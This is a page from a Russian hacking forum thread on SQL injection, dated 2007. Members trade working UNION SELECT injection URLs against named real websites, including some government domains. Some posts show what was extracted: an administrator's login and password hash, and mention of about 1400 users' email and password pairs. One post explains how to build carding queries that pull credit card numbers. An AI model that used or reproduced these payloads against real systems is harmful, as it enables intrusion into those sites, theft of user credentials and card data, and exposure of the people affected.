ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 110 из 1242 « Первая < 1060100 106 107 108 109 110 111 112 113 114 1201602106101110 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1091  
Старый 17.03.2007, 00:21
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию
чем проще?
 
Ответить с цитированием

  #1092  
Старый 17.03.2007, 00:22
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию
Spyder, согласен. Но в случае с выводом всего двух столбцов разницы имхо никакой)
так что:
red-tape.org
Код:
http://www.red-tape.org/initiatives.php?id=-1+union+select+1,concat(email,0x3a,password),3,4,5,6,7,8,9,10,11+from+ld_users+limit+0,1/*
около 1400 юзеров
пассы в md5
email:рass
 
Ответить с цитированием

  #1093  
Старый 17.03.2007, 00:25
Аватар для Helios
Helios
Постоянный
Регистрация: 14.01.2007
Сообщений: 459
Провел на форуме:
1469995

Репутация: 589
Отправить сообщение для Helios с помощью ICQ
По умолчанию
Вот, добил itjob.dp.ua:
Код:
http://itjob.dp.ua/product.php3?product=-1 union select 1,2,concat(id,char(58),login,char(58),passw,char(58),name),4,5,6 from auth/*
Вот он, админчег:
Код:
1:admin:ee550a634df47433c1f0caf2ef867c4d:Yuriy S.
 
Ответить с цитированием

  #1094  
Старый 17.03.2007, 00:36
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию
[ cash ], ты наркоман что ле или просто не знаешь что делает эта функция?
давай представим стандартный кардерский запрос c функцией concat()
select+1,concat(id,char(58),email,char(58),ccn,cha r(58),name,......),3
не проще ли сказать с помощью функцией CONCAT_WS()
select+1,concat_ws(char(58),id,email,ccn,name,...) ,3

Если ты просто не знаешь что она делает то эта функция в учебнике выглядит так CONCAT_WS(разделитель,строка1,с рока2,строка3)
Когда объеденяется 2 или 3 столбца то это конечно не нужно, но при больших запросах, где надо вывести много инфы лучше использовать эту функцию =)

ЗЫ У тебя на сайте написано
Цитата:
Взлом баз данных(MySQL,MsSQL,PoastageSQL,Oracle)
/me плачет
Последний раз редактировалось Spyder; 17.03.2007 в 00:45..
 
Ответить с цитированием

  #1095  
Старый 17.03.2007, 01:06
Аватар для XTErner
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию
Код:
http://www.rda.ge/news.php?id=-4+union+select+1,2,CONCAT_WS(char(58),user(),database(),version()),4,5,6,7,8,9,10/*

Код:
http://www.nsf.ac.lk/events.php?ID=22%20UNION%20SELECT%201,AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+mysql.user+limit+1,1/*
Последний раз редактировалось XTErner; 17.03.2007 в 01:08..
 
Ответить с цитированием

  #1096  
Старый 17.03.2007, 04:07
Аватар для chezz
chezz
Познающий
Регистрация: 19.02.2007
Сообщений: 45
Провел на форуме:
148427

Репутация: 19
Отправить сообщение для chezz с помощью ICQ
По умолчанию
Код:
http://www.fur.su/index.php?id=-1+union+select+1,2,3,4,5/*&type=1&lang=r&pg=1
 
Ответить с цитированием

  #1097  
Старый 17.03.2007, 14:38
Аватар для Colkru
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816

Репутация: 181
Отправить сообщение для Colkru с помощью ICQ
По умолчанию
http://www.volgagis.ru/web/editweb.php?id=-1+union+select+1,2,3,4,convert(version()+using+cp1 251),6,7,8,9,10,11,12,13/*
__
Наконец выходные!!!
 
Ответить с цитированием

  #1098  
Старый 17.03.2007, 14:56
Аватар для XTErner
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию
http://www.opera.ge/eng/news.php?id=-328+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,concat(password,0x3a,username),21,2 2,23,24,25,26,27,28,29,30,31,32+from+users/*&menu=news

))думал браузер
 
Ответить с цитированием

  #1099  
Старый 17.03.2007, 15:18
Аватар для Colkru
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816

Репутация: 181
Отправить сообщение для Colkru с помощью ICQ
По умолчанию
http://www.dama.cz/tisk.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,table _name,15,16,17,18+from+INFORMATION_SCHEMA.TABLES+l imit+65,1/*

5-ая версия))) 66 таблиц .
 
Ответить с цитированием

  #1100  
Старый 17.03.2007, 15:40
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию
Цитата:
http://www.bap10.uscourts.gov/rules.php?part=3&ID=-6+union+select+null,null,null,null,null,123
гов =\ чё то там ничё не получается вывести
update
Цитата:
http://www.tam.ca.gov/view.php?id=-1+union+select+1,2,version(),4
Последний раз редактировалось Spyder; 17.03.2007 в 16:09..
 
Ответить с цитированием
Ответ
Страница 110 из 1242 « Первая < 1060100 106 107 108 109 110 111 112 113 114 1201602106101110 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ